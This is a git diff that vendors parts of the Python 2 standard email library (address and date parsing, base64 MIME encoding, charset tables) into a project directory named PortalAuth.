# email.MIME<old name> -> email.mime.<new name is lowercased old name>
|
||||
'Audio',
|
||||
'Base',
|
||||
'Image',
|
||||
'Message',
|
||||
'Multipart',
|
||||
'NonMultipart',
|
||||
'Text',
|
||||
]
|
||||
|
||||
for _name in _LOWERNAMES:
|
||||
importer = LazyImporter(_name.lower())
|
||||
sys.modules['email.' + _name] = importer
|
||||
setattr(sys.modules['email'], _name, importer)
|
||||
|
||||
|
||||
import email.mime
|
||||
for _name in _MIMENAMES:
|
||||
importer = LazyImporter('mime.' + _name.lower())
|
||||
sys.modules['email.MIME' + _name] = importer
|
||||
setattr(sys.modules['email'], 'MIME' + _name, importer)
|
||||
setattr(sys.modules['email.mime'], _name, importer)
|
||||
BIN
PortalAuth/includes/scripts/libs/email/__init__.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/__init__.pyc
Executable file
Binary file not shown.
497
PortalAuth/includes/scripts/libs/email/_parseaddr.py
Executable file
497
PortalAuth/includes/scripts/libs/email/_parseaddr.py
Executable file
@@ -0,0 +1,497 @@
|
||||
# Copyright (C) 2002-2007 Python Software Foundation
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Email address parsing code.
|
||||
|
||||
Lifted directly from rfc822.py. This should eventually be rewritten.
|
||||
"""
|
||||
|
||||
__all__ = [
|
||||
'mktime_tz',
|
||||
'parsedate',
|
||||
'parsedate_tz',
|
||||
'quote',
|
||||
]
|
||||
|
||||
import time
|
||||
|
||||
SPACE = ' '
|
||||
EMPTYSTRING = ''
|
||||
COMMASPACE = ', '
|
||||
|
||||
# Parse a date field
|
||||
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
|
||||
'aug', 'sep', 'oct', 'nov', 'dec',
|
||||
'january', 'february', 'march', 'april', 'may', 'june', 'july',
|
||||
'august', 'september', 'october', 'november', 'december']
|
||||
|
||||
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
|
||||
|
||||
# The timezone table does not include the military time zones defined
|
||||
# in RFC822, other than Z. According to RFC1123, the description in
|
||||
# RFC822 gets the signs wrong, so we can't rely on any such time
|
||||
# zones. RFC1123 recommends that numeric timezone indicators be used
|
||||
# instead of timezone names.
|
||||
|
||||
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
|
||||
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
|
||||
'EST': -500, 'EDT': -400, # Eastern
|
||||
'CST': -600, 'CDT': -500, # Central
|
||||
'MST': -700, 'MDT': -600, # Mountain
|
||||
'PST': -800, 'PDT': -700 # Pacific
|
||||
}
|
||||
|
||||
|
||||
def parsedate_tz(data):
|
||||
"""Convert a date string to a time tuple.
|
||||
|
||||
Accounts for military timezones.
|
||||
"""
|
||||
data = data.split()
|
||||
# The FWS after the comma after the day-of-week is optional, so search and
|
||||
# adjust for this.
|
||||
if data[0].endswith(',') or data[0].lower() in _daynames:
|
||||
# There's a dayname here. Skip it
|
||||
del data[0]
|
||||
else:
|
||||
i = data[0].rfind(',')
|
||||
if i >= 0:
|
||||
data[0] = data[0][i+1:]
|
||||
if len(data) == 3: # RFC 850 date, deprecated
|
||||
stuff = data[0].split('-')
|
||||
if len(stuff) == 3:
|
||||
data = stuff + data[1:]
|
||||
if len(data) == 4:
|
||||
s = data[3]
|
||||
i = s.find('+')
|
||||
if i > 0:
|
||||
data[3:] = [s[:i], s[i+1:]]
|
||||
else:
|
||||
data.append('') # Dummy tz
|
||||
if len(data) < 5:
|
||||
return None
|
||||
data = data[:5]
|
||||
[dd, mm, yy, tm, tz] = data
|
||||
mm = mm.lower()
|
||||
if mm not in _monthnames:
|
||||
dd, mm = mm, dd.lower()
|
||||
if mm not in _monthnames:
|
||||
return None
|
||||
mm = _monthnames.index(mm) + 1
|
||||
if mm > 12:
|
||||
mm -= 12
|
||||
if dd[-1] == ',':
|
||||
dd = dd[:-1]
|
||||
i = yy.find(':')
|
||||
if i > 0:
|
||||
yy, tm = tm, yy
|
||||
if yy[-1] == ',':
|
||||
yy = yy[:-1]
|
||||
if not yy[0].isdigit():
|
||||
yy, tz = tz, yy
|
||||
if tm[-1] == ',':
|
||||
tm = tm[:-1]
|
||||
tm = tm.split(':')
|
||||
if len(tm) == 2:
|
||||
[thh, tmm] = tm
|
||||
tss = '0'
|
||||
elif len(tm) == 3:
|
||||
[thh, tmm, tss] = tm
|
||||
else:
|
||||
return None
|
||||
try:
|
||||
yy = int(yy)
|
||||
dd = int(dd)
|
||||
thh = int(thh)
|
||||
tmm = int(tmm)
|
||||
tss = int(tss)
|
||||
except ValueError:
|
||||
return None
|
||||
# Check for a yy specified in two-digit format, then convert it to the
|
||||
# appropriate four-digit format, according to the POSIX standard. RFC 822
|
||||
# calls for a two-digit yy, but RFC 2822 (which obsoletes RFC 822)
|
||||
# mandates a 4-digit yy. For more information, see the documentation for
|
||||
# the time module.
|
||||
if yy < 100:
|
||||
# The year is between 1969 and 1999 (inclusive).
|
||||
if yy > 68:
|
||||
yy += 1900
|
||||
# The year is between 2000 and 2068 (inclusive).
|
||||
else:
|
||||
yy += 2000
|
||||
tzoffset = None
|
||||
tz = tz.upper()
|
||||
if tz in _timezones:
|
||||
tzoffset = _timezones[tz]
|
||||
else:
|
||||
try:
|
||||
tzoffset = int(tz)
|
||||
except ValueError:
|
||||
pass
|
||||
# Convert a timezone offset into seconds ; -0500 -> -18000
|
||||
if tzoffset:
|
||||
if tzoffset < 0:
|
||||
tzsign = -1
|
||||
tzoffset = -tzoffset
|
||||
else:
|
||||
tzsign = 1
|
||||
tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
|
||||
# Daylight Saving Time flag is set to -1, since DST is unknown.
|
||||
return yy, mm, dd, thh, tmm, tss, 0, 1, -1, tzoffset
|
||||
|
||||
|
||||
def parsedate(data):
|
||||
"""Convert a time string to a time tuple."""
|
||||
t = parsedate_tz(data)
|
||||
if isinstance(t, tuple):
|
||||
return t[:9]
|
||||
else:
|
||||
return t
|
||||
|
||||
|
||||
def mktime_tz(data):
|
||||
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
|
||||
if data[9] is None:
|
||||
# No zone info, so localtime is better assumption than GMT
|
||||
return time.mktime(data[:8] + (-1,))
|
||||
else:
|
||||
t = time.mktime(data[:8] + (0,))
|
||||
return t - data[9] - time.timezone
|
||||
|
||||
|
||||
def quote(str):
|
||||
"""Prepare string to be used in a quoted string.
|
||||
|
||||
Turns backslash and double quote characters into quoted pairs. These
|
||||
are the only characters that need to be quoted inside a quoted string.
|
||||
Does not add the surrounding double quotes.
|
||||
"""
|
||||
return str.replace('\\', '\\\\').replace('"', '\\"')
|
||||
|
||||
|
||||
class AddrlistClass:
|
||||
"""Address parser class by Ben Escoto.
|
||||
|
||||
To understand what this class does, it helps to have a copy of RFC 2822 in
|
||||
front of you.
|
||||
|
||||
Note: this class interface is deprecated and may be removed in the future.
|
||||
Use rfc822.AddressList instead.
|
||||
"""
|
||||
|
||||
def __init__(self, field):
|
||||
"""Initialize a new instance.
|
||||
|
||||
`field' is an unparsed address header field, containing
|
||||
one or more addresses.
|
||||
"""
|
||||
self.specials = '()<>@,:;.\"[]'
|
||||
self.pos = 0
|
||||
self.LWS = ' \t'
|
||||
self.CR = '\r\n'
|
||||
self.FWS = self.LWS + self.CR
|
||||
self.atomends = self.specials + self.LWS + self.CR
|
||||
# Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
|
||||
# is obsolete syntax. RFC 2822 requires that we recognize obsolete
|
||||
# syntax, so allow dots in phrases.
|
||||
self.phraseends = self.atomends.replace('.', '')
|
||||
self.field = field
|
||||
self.commentlist = []
|
||||
|
||||
def gotonext(self):
|
||||
"""Parse up to the start of the next address."""
|
||||
while self.pos < len(self.field):
|
||||
if self.field[self.pos] in self.LWS + '\n\r':
|
||||
self.pos += 1
|
||||
elif self.field[self.pos] == '(':
|
||||
self.commentlist.append(self.getcomment())
|
||||
else:
|
||||
break
|
||||
|
||||
def getaddrlist(self):
|
||||
"""Parse all addresses.
|
||||
|
||||
Returns a list containing all of the addresses.
|
||||
"""
|
||||
result = []
|
||||
while self.pos < len(self.field):
|
||||
ad = self.getaddress()
|
||||
if ad:
|
||||
result += ad
|
||||
else:
|
||||
result.append(('', ''))
|
||||
return result
|
||||
|
||||
def getaddress(self):
|
||||
"""Parse the next address."""
|
||||
self.commentlist = []
|
||||
self.gotonext()
|
||||
|
||||
oldpos = self.pos
|
||||
oldcl = self.commentlist
|
||||
plist = self.getphraselist()
|
||||
|
||||
self.gotonext()
|
||||
returnlist = []
|
||||
|
||||
if self.pos >= len(self.field):
|
||||
# Bad email address technically, no domain.
|
||||
if plist:
|
||||
returnlist = [(SPACE.join(self.commentlist), plist[0])]
|
||||
|
||||
elif self.field[self.pos] in '.@':
|
||||
# email address is just an addrspec
|
||||
# this isn't very efficient since we start over
|
||||
self.pos = oldpos
|
||||
self.commentlist = oldcl
|
||||
addrspec = self.getaddrspec()
|
||||
returnlist = [(SPACE.join(self.commentlist), addrspec)]
|
||||
|
||||
elif self.field[self.pos] == ':':
|
||||
# address is a group
|
||||
returnlist = []
|
||||
|
||||
fieldlen = len(self.field)
|
||||
self.pos += 1
|
||||
while self.pos < len(self.field):
|
||||
self.gotonext()
|
||||
if self.pos < fieldlen and self.field[self.pos] == ';':
|
||||
self.pos += 1
|
||||
break
|
||||
returnlist = returnlist + self.getaddress()
|
||||
|
||||
elif self.field[self.pos] == '<':
|
||||
# Address is a phrase then a route addr
|
||||
routeaddr = self.getrouteaddr()
|
||||
|
||||
if self.commentlist:
|
||||
returnlist = [(SPACE.join(plist) + ' (' +
|
||||
' '.join(self.commentlist) + ')', routeaddr)]
|
||||
else:
|
||||
returnlist = [(SPACE.join(plist), routeaddr)]
|
||||
|
||||
else:
|
||||
if plist:
|
||||
returnlist = [(SPACE.join(self.commentlist), plist[0])]
|
||||
elif self.field[self.pos] in self.specials:
|
||||
self.pos += 1
|
||||
|
||||
self.gotonext()
|
||||
if self.pos < len(self.field) and self.field[self.pos] == ',':
|
||||
self.pos += 1
|
||||
return returnlist
|
||||
|
||||
def getrouteaddr(self):
|
||||
"""Parse a route address (Return-path value).
|
||||
|
||||
This method just skips all the route stuff and returns the addrspec.
|
||||
"""
|
||||
if self.field[self.pos] != '<':
|
||||
return
|
||||
|
||||
expectroute = False
|
||||
self.pos += 1
|
||||
self.gotonext()
|
||||
adlist = ''
|
||||
while self.pos < len(self.field):
|
||||
if expectroute:
|
||||
self.getdomain()
|
||||
expectroute = False
|
||||
elif self.field[self.pos] == '>':
|
||||
self.pos += 1
|
||||
break
|
||||
elif self.field[self.pos] == '@':
|
||||
self.pos += 1
|
||||
expectroute = True
|
||||
elif self.field[self.pos] == ':':
|
||||
self.pos += 1
|
||||
else:
|
||||
adlist = self.getaddrspec()
|
||||
self.pos += 1
|
||||
break
|
||||
self.gotonext()
|
||||
|
||||
return adlist
|
||||
|
||||
def getaddrspec(self):
|
||||
"""Parse an RFC 2822 addr-spec."""
|
||||
aslist = []
|
||||
|
||||
self.gotonext()
|
||||
while self.pos < len(self.field):
|
||||
if self.field[self.pos] == '.':
|
||||
aslist.append('.')
|
||||
self.pos += 1
|
||||
elif self.field[self.pos] == '"':
|
||||
aslist.append('"%s"' % quote(self.getquote()))
|
||||
elif self.field[self.pos] in self.atomends:
|
||||
break
|
||||
else:
|
||||
aslist.append(self.getatom())
|
||||
self.gotonext()
|
||||
|
||||
if self.pos >= len(self.field) or self.field[self.pos] != '@':
|
||||
return EMPTYSTRING.join(aslist)
|
||||
|
||||
aslist.append('@')
|
||||
self.pos += 1
|
||||
self.gotonext()
|
||||
return EMPTYSTRING.join(aslist) + self.getdomain()
|
||||
|
||||
def getdomain(self):
|
||||
"""Get the complete domain name from an address."""
|
||||
sdlist = []
|
||||
while self.pos < len(self.field):
|
||||
if self.field[self.pos] in self.LWS:
|
||||
self.pos += 1
|
||||
elif self.field[self.pos] == '(':
|
||||
self.commentlist.append(self.getcomment())
|
||||
elif self.field[self.pos] == '[':
|
||||
sdlist.append(self.getdomainliteral())
|
||||
elif self.field[self.pos] == '.':
|
||||
self.pos += 1
|
||||
sdlist.append('.')
|
||||
elif self.field[self.pos] in self.atomends:
|
||||
break
|
||||
else:
|
||||
sdlist.append(self.getatom())
|
||||
return EMPTYSTRING.join(sdlist)
|
||||
|
||||
def getdelimited(self, beginchar, endchars, allowcomments=True):
|
||||
"""Parse a header fragment delimited by special characters.
|
||||
|
||||
`beginchar' is the start character for the fragment.
|
||||
If self is not looking at an instance of `beginchar' then
|
||||
getdelimited returns the empty string.
|
||||
|
||||
`endchars' is a sequence of allowable end-delimiting characters.
|
||||
Parsing stops when one of these is encountered.
|
||||
|
||||
If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
|
||||
within the parsed fragment.
|
||||
"""
|
||||
if self.field[self.pos] != beginchar:
|
||||
return ''
|
||||
|
||||
slist = ['']
|
||||
quote = False
|
||||
self.pos += 1
|
||||
while self.pos < len(self.field):
|
||||
if quote:
|
||||
slist.append(self.field[self.pos])
|
||||
quote = False
|
||||
elif self.field[self.pos] in endchars:
|
||||
self.pos += 1
|
||||
break
|
||||
elif allowcomments and self.field[self.pos] == '(':
|
||||
slist.append(self.getcomment())
|
||||
continue # have already advanced pos from getcomment
|
||||
elif self.field[self.pos] == '\\':
|
||||
quote = True
|
||||
else:
|
||||
slist.append(self.field[self.pos])
|
||||
self.pos += 1
|
||||
|
||||
return EMPTYSTRING.join(slist)
|
||||
|
||||
def getquote(self):
|
||||
"""Get a quote-delimited fragment from self's field."""
|
||||
return self.getdelimited('"', '"\r', False)
|
||||
|
||||
def getcomment(self):
|
||||
"""Get a parenthesis-delimited fragment from self's field."""
|
||||
return self.getdelimited('(', ')\r', True)
|
||||
|
||||
def getdomainliteral(self):
|
||||
"""Parse an RFC 2822 domain-literal."""
|
||||
return '[%s]' % self.getdelimited('[', ']\r', False)
|
||||
|
||||
def getatom(self, atomends=None):
|
||||
"""Parse an RFC 2822 atom.
|
||||
|
||||
Optional atomends specifies a different set of end token delimiters
|
||||
(the default is to use self.atomends). This is used e.g. in
|
||||
getphraselist() since phrase endings must not include the `.' (which
|
||||
is legal in phrases)."""
|
||||
atomlist = ['']
|
||||
if atomends is None:
|
||||
atomends = self.atomends
|
||||
|
||||
while self.pos < len(self.field):
|
||||
if self.field[self.pos] in atomends:
|
||||
break
|
||||
else:
|
||||
atomlist.append(self.field[self.pos])
|
||||
self.pos += 1
|
||||
|
||||
return EMPTYSTRING.join(atomlist)
|
||||
|
||||
def getphraselist(self):
|
||||
"""Parse a sequence of RFC 2822 phrases.
|
||||
|
||||
A phrase is a sequence of words, which are in turn either RFC 2822
|
||||
atoms or quoted-strings. Phrases are canonicalized by squeezing all
|
||||
runs of continuous whitespace into one space.
|
||||
"""
|
||||
plist = []
|
||||
|
||||
while self.pos < len(self.field):
|
||||
if self.field[self.pos] in self.FWS:
|
||||
self.pos += 1
|
||||
elif self.field[self.pos] == '"':
|
||||
plist.append(self.getquote())
|
||||
elif self.field[self.pos] == '(':
|
||||
self.commentlist.append(self.getcomment())
|
||||
elif self.field[self.pos] in self.phraseends:
|
||||
break
|
||||
else:
|
||||
plist.append(self.getatom(self.phraseends))
|
||||
|
||||
return plist
|
||||
|
||||
class AddressList(AddrlistClass):
|
||||
"""An AddressList encapsulates a list of parsed RFC 2822 addresses."""
|
||||
def __init__(self, field):
|
||||
AddrlistClass.__init__(self, field)
|
||||
if field:
|
||||
self.addresslist = self.getaddrlist()
|
||||
else:
|
||||
self.addresslist = []
|
||||
|
||||
def __len__(self):
|
||||
return len(self.addresslist)
|
||||
|
||||
def __add__(self, other):
|
||||
# Set union
|
||||
newaddr = AddressList(None)
|
||||
newaddr.addresslist = self.addresslist[:]
|
||||
for x in other.addresslist:
|
||||
if not x in self.addresslist:
|
||||
newaddr.addresslist.append(x)
|
||||
return newaddr
|
||||
|
||||
def __iadd__(self, other):
|
||||
# Set union, in-place
|
||||
for x in other.addresslist:
|
||||
if not x in self.addresslist:
|
||||
self.addresslist.append(x)
|
||||
return self
|
||||
|
||||
def __sub__(self, other):
|
||||
# Set difference
|
||||
newaddr = AddressList(None)
|
||||
for x in self.addresslist:
|
||||
if not x in other.addresslist:
|
||||
newaddr.addresslist.append(x)
|
||||
return newaddr
|
||||
|
||||
def __isub__(self, other):
|
||||
# Set difference, in-place
|
||||
for x in other.addresslist:
|
||||
if x in self.addresslist:
|
||||
self.addresslist.remove(x)
|
||||
return self
|
||||
|
||||
def __getitem__(self, index):
|
||||
# Make indexing, slices, and 'in' work
|
||||
return self.addresslist[index]
|
||||
BIN
PortalAuth/includes/scripts/libs/email/_parseaddr.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/_parseaddr.pyc
Executable file
Binary file not shown.
183
PortalAuth/includes/scripts/libs/email/base64mime.py
Executable file
183
PortalAuth/includes/scripts/libs/email/base64mime.py
Executable file
@@ -0,0 +1,183 @@
|
||||
# Copyright (C) 2002-2006 Python Software Foundation
|
||||
# Author: Ben Gertzfield
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Base64 content transfer encoding per RFCs 2045-2047.
|
||||
|
||||
This module handles the content transfer encoding method defined in RFC 2045
|
||||
to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit
|
||||
characters encoding known as Base64.
|
||||
|
||||
It is used in the MIME standards for email to attach images, audio, and text
|
||||
using some 8-bit character sets to messages.
|
||||
|
||||
This module provides an interface to encode and decode both headers and bodies
|
||||
with Base64 encoding.
|
||||
|
||||
RFC 2045 defines a method for including character set information in an
|
||||
`encoded-word' in a header. This method is commonly used for 8-bit real names
|
||||
in To:, From:, Cc:, etc. fields, as well as Subject: lines.
|
||||
|
||||
This module does not do the line wrapping or end-of-line character conversion
|
||||
necessary for proper internationalized headers; it only does dumb encoding and
|
||||
decoding. To deal with the various line wrapping issues, use the email.header
|
||||
module.
|
||||
"""
|
||||
|
||||
__all__ = [
|
||||
'base64_len',
|
||||
'body_decode',
|
||||
'body_encode',
|
||||
'decode',
|
||||
'decodestring',
|
||||
'encode',
|
||||
'encodestring',
|
||||
'header_encode',
|
||||
]
|
||||
|
||||
|
||||
from binascii import b2a_base64, a2b_base64
|
||||
from email.utils import fix_eols
|
||||
|
||||
CRLF = '\r\n'
|
||||
NL = '\n'
|
||||
EMPTYSTRING = ''
|
||||
|
||||
# See also Charset.py
|
||||
MISC_LEN = 7
|
||||
|
||||
|
||||
|
||||
# Helpers
|
||||
def base64_len(s):
|
||||
"""Return the length of s when it is encoded with base64."""
|
||||
groups_of_3, leftover = divmod(len(s), 3)
|
||||
# 4 bytes out for each 3 bytes (or nonzero fraction thereof) in.
|
||||
# Thanks, Tim!
|
||||
n = groups_of_3 * 4
|
||||
if leftover:
|
||||
n += 4
|
||||
return n
|
||||
|
||||
|
||||
|
||||
def header_encode(header, charset='iso-8859-1', keep_eols=False,
|
||||
maxlinelen=76, eol=NL):
|
||||
"""Encode a single header line with Base64 encoding in a given charset.
|
||||
|
||||
Defined in RFC 2045, this Base64 encoding is identical to normal Base64
|
||||
encoding, except that each line must be intelligently wrapped (respecting
|
||||
the Base64 encoding), and subsequent lines must start with a space.
|
||||
|
||||
charset names the character set to use to encode the header. It defaults
|
||||
to iso-8859-1.
|
||||
|
||||
End-of-line characters (\\r, \\n, \\r\\n) will be automatically converted
|
||||
to the canonical email line separator \\r\\n unless the keep_eols
|
||||
parameter is True (the default is False).
|
||||
|
||||
Each line of the header will be terminated in the value of eol, which
|
||||
defaults to "\\n". Set this to "\\r\\n" if you are using the result of
|
||||
this function directly in email.
|
||||
|
||||
The resulting string will be in the form:
|
||||
|
||||
"=?charset?b?WW/5ciBtYXp66XLrIHf8eiBhIGhhbXBzdGHuciBBIFlv+XIgbWF6euly?=\\n
|
||||
=?charset?b?6yB3/HogYSBoYW1wc3Rh7nIgQkMgWW/5ciBtYXp66XLrIHf8eiBhIGhh?="
|
||||
|
||||
with each line wrapped at, at most, maxlinelen characters (defaults to 76
|
||||
characters).
|
||||
"""
|
||||
# Return empty headers unchanged
|
||||
if not header:
|
||||
return header
|
||||
|
||||
if not keep_eols:
|
||||
header = fix_eols(header)
|
||||
|
||||
# Base64 encode each line, in encoded chunks no greater than maxlinelen in
|
||||
# length, after the RFC chrome is added in.
|
||||
base64ed = []
|
||||
max_encoded = maxlinelen - len(charset) - MISC_LEN
|
||||
max_unencoded = max_encoded * 3 // 4
|
||||
|
||||
for i in range(0, len(header), max_unencoded):
|
||||
base64ed.append(b2a_base64(header[i:i+max_unencoded]))
|
||||
|
||||
# Now add the RFC chrome to each encoded chunk
|
||||
lines = []
|
||||
for line in base64ed:
|
||||
# Ignore the last character of each line if it is a newline
|
||||
if line.endswith(NL):
|
||||
line = line[:-1]
|
||||
# Add the chrome
|
||||
lines.append('=?%s?b?%s?=' % (charset, line))
|
||||
# Glue the lines together and return it. BAW: should we be able to
|
||||
# specify the leading whitespace in the joiner?
|
||||
joiner = eol + ' '
|
||||
return joiner.join(lines)
|
||||
|
||||
|
||||
|
||||
def encode(s, binary=True, maxlinelen=76, eol=NL):
|
||||
"""Encode a string with base64.
|
||||
|
||||
Each line will be wrapped at, at most, maxlinelen characters (defaults to
|
||||
76 characters).
|
||||
|
||||
If binary is False, end-of-line characters will be converted to the
|
||||
canonical email end-of-line sequence \\r\\n. Otherwise they will be left
|
||||
verbatim (this is the default).
|
||||
|
||||
Each line of encoded text will end with eol, which defaults to "\\n". Set
|
||||
this to "\r\n" if you will be using the result of this function directly
|
||||
in an email.
|
||||
"""
|
||||
if not s:
|
||||
return s
|
||||
|
||||
if not binary:
|
||||
s = fix_eols(s)
|
||||
|
||||
encvec = []
|
||||
max_unencoded = maxlinelen * 3 // 4
|
||||
for i in range(0, len(s), max_unencoded):
|
||||
# BAW: should encode() inherit b2a_base64()'s dubious behavior in
|
||||
# adding a newline to the encoded string?
|
||||
enc = b2a_base64(s[i:i + max_unencoded])
|
||||
if enc.endswith(NL) and eol != NL:
|
||||
enc = enc[:-1] + eol
|
||||
encvec.append(enc)
|
||||
return EMPTYSTRING.join(encvec)
|
||||
|
||||
|
||||
# For convenience and backwards compatibility w/ standard base64 module
|
||||
body_encode = encode
|
||||
encodestring = encode
|
||||
|
||||
|
||||
|
||||
def decode(s, convert_eols=None):
|
||||
"""Decode a raw base64 string.
|
||||
|
||||
If convert_eols is set to a string value, all canonical email linefeeds,
|
||||
e.g. "\\r\\n", in the decoded text will be converted to the value of
|
||||
convert_eols. os.linesep is a good choice for convert_eols if you are
|
||||
decoding a text attachment.
|
||||
|
||||
This function does not parse a full MIME header value encoded with
|
||||
base64 (like =?iso-8895-1?b?bmloISBuaWgh?=) -- please use the high
|
||||
level email.header class for that functionality.
|
||||
"""
|
||||
if not s:
|
||||
return s
|
||||
|
||||
dec = a2b_base64(s)
|
||||
if convert_eols:
|
||||
return dec.replace(CRLF, convert_eols)
|
||||
return dec
|
||||
|
||||
|
||||
# For convenience and backwards compatibility w/ standard base64 module
|
||||
body_decode = decode
|
||||
decodestring = decode
|
||||
BIN
PortalAuth/includes/scripts/libs/email/base64mime.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/base64mime.pyc
Executable file
Binary file not shown.
397
PortalAuth/includes/scripts/libs/email/charset.py
Executable file
397
PortalAuth/includes/scripts/libs/email/charset.py
Executable file
@@ -0,0 +1,397 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Ben Gertzfield, Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
__all__ = [
|
||||
'Charset',
|
||||
'add_alias',
|
||||
'add_charset',
|
||||
'add_codec',
|
||||
]
|
||||
|
||||
import codecs
|
||||
import email.base64mime
|
||||
import email.quoprimime
|
||||
|
||||
from email import errors
|
||||
from email.encoders import encode_7or8bit
|
||||
|
||||
|
||||
|
||||
# Flags for types of header encodings
|
||||
QP = 1 # Quoted-Printable
|
||||
BASE64 = 2 # Base64
|
||||
SHORTEST = 3 # the shorter of QP and base64, but only for headers
|
||||
|
||||
# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7
|
||||
MISC_LEN = 7
|
||||
|
||||
DEFAULT_CHARSET = 'us-ascii'
|
||||
|
||||
|
||||
|
||||
# Defaults
|
||||
CHARSETS = {
|
||||
# input header enc body enc output conv
|
||||
'iso-8859-1': (QP, QP, None),
|
||||
'iso-8859-2': (QP, QP, None),
|
||||
'iso-8859-3': (QP, QP, None),
|
||||
'iso-8859-4': (QP, QP, None),
|
||||
# iso-8859-5 is Cyrillic, and not especially used
|
||||
# iso-8859-6 is Arabic, also not particularly used
|
||||
# iso-8859-7 is Greek, QP will not make it readable
|
||||
# iso-8859-8 is Hebrew, QP will not make it readable
|
||||
'iso-8859-9': (QP, QP, None),
|
||||
'iso-8859-10': (QP, QP, None),
|
||||
# iso-8859-11 is Thai, QP will not make it readable
|
||||
'iso-8859-13': (QP, QP, None),
|
||||
'iso-8859-14': (QP, QP, None),
|
||||
'iso-8859-15': (QP, QP, None),
|
||||
'iso-8859-16': (QP, QP, None),
|
||||
'windows-1252':(QP, QP, None),
|
||||
'viscii': (QP, QP, None),
|
||||
'us-ascii': (None, None, None),
|
||||
'big5': (BASE64, BASE64, None),
|
||||
'gb2312': (BASE64, BASE64, None),
|
||||
'euc-jp': (BASE64, None, 'iso-2022-jp'),
|
||||
'shift_jis': (BASE64, None, 'iso-2022-jp'),
|
||||
'iso-2022-jp': (BASE64, None, None),
|
||||
'koi8-r': (BASE64, BASE64, None),
|
||||
'utf-8': (SHORTEST, BASE64, 'utf-8'),
|
||||
# We're making this one up to represent raw unencoded 8-bit
|
||||
'8bit': (None, BASE64, 'utf-8'),
|
||||
}
|
||||
|
||||
# Aliases for other commonly-used names for character sets. Map
|
||||
# them to the real ones used in email.
|
||||
ALIASES = {
|
||||
'latin_1': 'iso-8859-1',
|
||||
'latin-1': 'iso-8859-1',
|
||||
'latin_2': 'iso-8859-2',
|
||||
'latin-2': 'iso-8859-2',
|
||||
'latin_3': 'iso-8859-3',
|
||||
'latin-3': 'iso-8859-3',
|
||||
'latin_4': 'iso-8859-4',
|
||||
'latin-4': 'iso-8859-4',
|
||||
'latin_5': 'iso-8859-9',
|
||||
'latin-5': 'iso-8859-9',
|
||||
'latin_6': 'iso-8859-10',
|
||||
'latin-6': 'iso-8859-10',
|
||||
'latin_7': 'iso-8859-13',
|
||||
'latin-7': 'iso-8859-13',
|
||||
'latin_8': 'iso-8859-14',
|
||||
'latin-8': 'iso-8859-14',
|
||||
'latin_9': 'iso-8859-15',
|
||||
'latin-9': 'iso-8859-15',
|
||||
'latin_10':'iso-8859-16',
|
||||
'latin-10':'iso-8859-16',
|
||||
'cp949': 'ks_c_5601-1987',
|
||||
'euc_jp': 'euc-jp',
|
||||
'euc_kr': 'euc-kr',
|
||||
'ascii': 'us-ascii',
|
||||
}
|
||||
|
||||
|
||||
# Map charsets to their Unicode codec strings.
|
||||
CODEC_MAP = {
|
||||
'gb2312': 'eucgb2312_cn',
|
||||
'big5': 'big5_tw',
|
||||
# Hack: We don't want *any* conversion for stuff marked us-ascii, as all
|
||||
# sorts of garbage might be sent to us in the guise of 7-bit us-ascii.
|
||||
# Let that stuff pass through without conversion to/from Unicode.
|
||||
'us-ascii': None,
|
||||
}
|
||||
|
||||
|
||||
|
||||
# Convenience functions for extending the above mappings
|
||||
def add_charset(charset, header_enc=None, body_enc=None, output_charset=None):
|
||||
"""Add character set properties to the global registry.
|
||||
|
||||
charset is the input character set, and must be the canonical name of a
|
||||
character set.
|
||||
|
||||
Optional header_enc and body_enc is either Charset.QP for
|
||||
quoted-printable, Charset.BASE64 for base64 encoding, Charset.SHORTEST for
|
||||
the shortest of qp or base64 encoding, or None for no encoding. SHORTEST
|
||||
is only valid for header_enc. It describes how message headers and
|
||||
message bodies in the input charset are to be encoded. Default is no
|
||||
encoding.
|
||||
|
||||
Optional output_charset is the character set that the output should be
|
||||
in. Conversions will proceed from input charset, to Unicode, to the
|
||||
output charset when the method Charset.convert() is called. The default
|
||||
is to output in the same character set as the input.
|
||||
|
||||
Both input_charset and output_charset must have Unicode codec entries in
|
||||
the module's charset-to-codec mapping; use add_codec(charset, codecname)
|
||||
to add codecs the module does not know about. See the codecs module's
|
||||
documentation for more information.
|
||||
"""
|
||||
if body_enc == SHORTEST:
|
||||
raise ValueError('SHORTEST not allowed for body_enc')
|
||||
CHARSETS[charset] = (header_enc, body_enc, output_charset)
|
||||
|
||||
|
||||
def add_alias(alias, canonical):
|
||||
"""Add a character set alias.
|
||||
|
||||
alias is the alias name, e.g. latin-1
|
||||
canonical is the character set's canonical name, e.g. iso-8859-1
|
||||
"""
|
||||
ALIASES[alias] = canonical
|
||||
|
||||
|
||||
def add_codec(charset, codecname):
|
||||
"""Add a codec that map characters in the given charset to/from Unicode.
|
||||
|
||||
charset is the canonical name of a character set. codecname is the name
|
||||
of a Python codec, as appropriate for the second argument to the unicode()
|
||||
built-in, or to the encode() method of a Unicode string.
|
||||
"""
|
||||
CODEC_MAP[charset] = codecname
|
||||
|
||||
|
||||
|
||||
class Charset:
|
||||
"""Map character sets to their email properties.
|
||||
|
||||
This class provides information about the requirements imposed on email
|
||||
for a specific character set. It also provides convenience routines for
|
||||
converting between character sets, given the availability of the
|
||||
applicable codecs. Given a character set, it will do its best to provide
|
||||
information on how to use that character set in an email in an
|
||||
RFC-compliant way.
|
||||
|
||||
Certain character sets must be encoded with quoted-printable or base64
|
||||
when used in email headers or bodies. Certain character sets must be
|
||||
converted outright, and are not allowed in email. Instances of this
|
||||
